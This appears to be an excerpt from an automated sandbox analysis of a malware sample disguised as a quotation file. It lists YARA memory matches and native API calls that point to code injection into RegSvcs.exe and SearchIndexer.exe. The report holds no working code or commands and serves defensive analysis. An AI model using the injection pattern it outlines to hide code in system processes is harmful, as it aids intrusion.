Source: Yara match	File source: 0000000F.00000002.3749270858.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3751418671.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747889466.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1745726958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747623223.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3749267228.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION NO REQ-19-000640.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0042CCB3 NtClose,	10_2_0042CCB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040AD01 NtDelayExecution,	10_2_0040AD01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02B60 NtClose,LdrInitializeThunk,	10_2_01A02B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_01A02DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_01A02C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A035C0 NtCreateMutant,LdrInitializeThunk,	10_2_01A035C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A04340 NtSetContextThread,	10_2_01A04340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A04650 NtSuspendThread,	10_2_01A04650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02BA0 NtEnumerateValueKey,	10_2_01A02BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02B80 NtQueryInformationFile,	10_2_01A02B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02BE0 NtQueryValueKey,	10_2_01A02BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02BF0 NtAllocateVirtualMemory,	10_2_01A02BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02AB0 NtWaitForSingleObject,	10_2_01A02AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02AF0 NtWriteFile,	10_2_01A02AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02AD0 NtReadFile,	10_2_01A02AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02DB0 NtEnumerateKey,	10_2_01A02DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02DD0 NtDelayExecution,	10_2_01A02DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02D30 NtUnmapViewOfSection,	10_2_01A02D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02D00 NtSetInformationFile,	10_2_01A02D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02D10 NtMapViewOfSection,	10_2_01A02D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02CA0 NtQueryInformationToken,	10_2_01A02CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02CF0 NtOpenProcess,	10_2_01A02CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02CC0 NtQueryVirtualMemory,	10_2_01A02CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02C00 NtQueryInformationProcess,	10_2_01A02C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02C60 NtCreateKey,	10_2_01A02C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02FA0 NtQuerySection,	10_2_01A02FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02FB0 NtResumeThread,	10_2_01A02FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02F90 NtProtectVirtualMemory,	10_2_01A02F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02FE0 NtCreateFile,	10_2_01A02FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02F30 NtCreateSection,	10_2_01A02F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02F60 NtCreateProcessEx,	10_2_01A02F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02EA0 NtAdjustPrivilegesToken,	10_2_01A02EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02E80 NtReadVirtualMemory,	10_2_01A02E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02EE0 NtQueueApcThread,	10_2_01A02EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A02E30 NtWriteVirtualMemory,	10_2_01A02E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A03090 NtSetValueKey,	10_2_01A03090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A03010 NtOpenDirectoryObject,	10_2_01A03010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A039B0 NtGetContextThread,	10_2_01A039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A03D10 NtOpenProcessToken,	10_2_01A03D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A03D70 NtOpenThread,	10_2_01A03D70
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B4340 NtSetContextThread,LdrInitializeThunk,	15_2_035B4340
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B4650 NtSuspendThread,LdrInitializeThunk,	15_2_035B4650
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2B60 NtClose,LdrInitializeThunk,	15_2_035B2B60
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_035B2BF0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2BE0 NtQueryValueKey,LdrInitializeThunk,	15_2_035B2BE0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	15_2_035B2BA0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2AD0 NtReadFile,LdrInitializeThunk,	15_2_035B2AD0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2AF0 NtWriteFile,LdrInitializeThunk,	15_2_035B2AF0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2F30 NtCreateSection,LdrInitializeThunk,	15_2_035B2F30
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2FE0 NtCreateFile,LdrInitializeThunk,	15_2_035B2FE0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2FB0 NtResumeThread,LdrInitializeThunk,	15_2_035B2FB0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2EE0 NtQueueApcThread,LdrInitializeThunk,	15_2_035B2EE0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2E80 NtReadVirtualMemory,LdrInitializeThunk,	15_2_035B2E80
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_035B2D10
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_035B2D30
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2DD0 NtDelayExecution,LdrInitializeThunk,	15_2_035B2DD0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_035B2DF0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_035B2C70
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2C60 NtCreateKey,LdrInitializeThunk,	15_2_035B2C60
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_035B2CA0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B35C0 NtCreateMutant,LdrInitializeThunk,	15_2_035B35C0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B39B0 NtGetContextThread,LdrInitializeThunk,	15_2_035B39B0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2B80 NtQueryInformationFile,	15_2_035B2B80
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2AB0 NtWaitForSingleObject,	15_2_035B2AB0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2F60 NtCreateProcessEx,	15_2_035B2F60
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2F90 NtProtectVirtualMemory,	15_2_035B2F90
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2FA0 NtQuerySection,	15_2_035B2FA0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2E30 NtWriteVirtualMemory,	15_2_035B2E30
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2EA0 NtAdjustPrivilegesToken,	15_2_035B2EA0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2D00 NtSetInformationFile,	15_2_035B2D00
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2DB0 NtEnumerateKey,	15_2_035B2DB0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2C00 NtQueryInformationProcess,	15_2_035B2C00
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2CC0 NtQueryVirtualMemory,	15_2_035B2CC0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B2CF0 NtOpenProcess,	15_2_035B2CF0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B3010 NtOpenDirectoryObject,	15_2_035B3010
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B3090 NtSetValueKey,	15_2_035B3090
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B3D70 NtOpenThread,	15_2_035B3D70
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_035B3D10 NtOpenProcessToken,	15_2_035B3D10
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BA9680 NtReadFile,	15_2_02BA9680
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BA9770 NtDeleteFile,	15_2_02BA9770
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BA9510 NtCreateFile,	15_2_02BA9510
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BA9810 NtClose,	15_2_02BA9810
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 15_2_02BA9970 NtAllocateVirtualMemory,	15_2_02BA9970

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_049DD3E4	0_2_049DD3E4
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514E6F8	0_2_0514E6F8
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514CD80	0_2_0514CD80
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05146DA8	0_2_05146DA8
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05147CB8	0_2_05147CB8
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514A550	0_2_0514A550
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514A540	0_2_0514A540
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514D4B0	0_2_0514D4B0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514D4C0	0_2_0514D4C0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514E6E9	0_2_0514E6E9
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514A1F0	0_2_0514A1F0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514D018	0_2_0514D018
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514E018	0_2_0514E018
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514D008	0_2_0514D008
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514E00B	0_2_0514E00B
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05146399	0_2_05146399
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_051463A8	0_2_051463A8
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514A200	0_2_0514A200
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514D25B	0_2_0514D25B
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514D268	0_2_0514D268
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514CD6F	0_2_0514CD6F
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05146D98	0_2_05146D98
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05149DF1	0_2_05149DF1
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05144C99	0_2_05144C99
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05144CA8	0_2_05144CA8
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05149F70	0_2_05149F70
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05149F60	0_2_05149F60
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05149E00	0_2_05149E00
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_051499D1	0_2_051499D1
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_051499E0	0_2_051499E0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05145B68	0_2_05145B68
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05148B90	0_2_05148B90
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05148B81	0_2_05148B81
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05145B88	0_2_05145B88
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_05147BB7	0_2_05147BB7
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514EBD0	0_2_0514EBD0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_0514EBC0	0_2_0514EBC0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A91646	0_2_06A91646
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A96301	0_2_06A96301
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A96310	0_2_06A96310
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A95ED8	0_2_06A95ED8
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A97F48	0_2_06A97F48
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A95AA0	0_2_06A95AA0
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A97B03	0_2_06A97B03
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Code function: 0_2_06A97B10	0_2_06A97B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00401A1B	10_2_00401A1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00418AD3	10_2_00418AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00402900	10_2_00402900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00401240	10_2_00401240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0041025B	10_2_0041025B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00410263	10_2_00410263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00403220	10_2_00403220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0042F2E3	10_2_0042F2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004023B4	10_2_004023B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040E463	10_2_0040E463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00402411	10_2_00402411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00402420	10_2_00402420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00416CCE	10_2_00416CCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00416CD3	10_2_00416CD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00410483	10_2_00410483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00401D10	10_2_00401D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004025DF	10_2_004025DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004025E0	10_2_004025E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040E5A7	10_2_0040E5A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040E5B3	10_2_0040E5B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A901AA	10_2_01A901AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A841A2	10_2_01A841A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A881CC	10_2_01A881CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019C0100	10_2_019C0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A6A118	10_2_01A6A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A58158	10_2_01A58158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A62000	10_2_01A62000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A903E6	10_2_01A903E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019DE3F0	10_2_019DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8A352	10_2_01A8A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A502C0	10_2_01A502C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A70274	10_2_01A70274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A90591	10_2_01A90591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D0535	10_2_019D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A7E4F6	10_2_01A7E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A74420	10_2_01A74420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A82446	10_2_01A82446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019CC7C0	10_2_019CC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019F4750	10_2_019F4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D0770	10_2_019D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019EC6E0	10_2_019EC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A9A9A6	10_2_01A9A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D29A0	10_2_019D29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019E6962	10_2_019E6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019B68B8	10_2_019B68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019FE8F0	10_2_019FE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019DA840	10_2_019DA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D2840	10_2_019D2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A86BD7	10_2_01A86BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8AB40	10_2_01A8AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019CEA80	10_2_019CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019E8DBF	10_2_019E8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019CADE0	10_2_019CADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019DAD00	10_2_019DAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A6CD1F	10_2_01A6CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A70CB5	10_2_01A70CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019C0CF2	10_2_019C0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D0C00	10_2_019D0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A4EFA0	10_2_01A4EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019C2FC8	10_2_019C2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019DCFE0	10_2_019DCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A12F28	10_2_01A12F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A72F30	10_2_01A72F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019F0F30	10_2_019F0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A44F40	10_2_01A44F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019E2E90	10_2_019E2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8CE93	10_2_01A8CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8EEDB	10_2_01A8EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8EE26	10_2_01A8EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D0E59	10_2_019D0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019DB1B0	10_2_019DB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A9B16B	10_2_01A9B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A0516C	10_2_01A0516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019BF172	10_2_019BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A870E9	10_2_01A870E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8F0E0	10_2_01A8F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D70C0	10_2_019D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A7F0CC	10_2_01A7F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A1739A	10_2_01A1739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A8132D	10_2_01A8132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019BD34C	10_2_019BD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019D52A0	10_2_019D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A712ED	10_2_01A712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_019EB2C0	10_2_019EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01A6D5B0	10_2_01A6D5B0
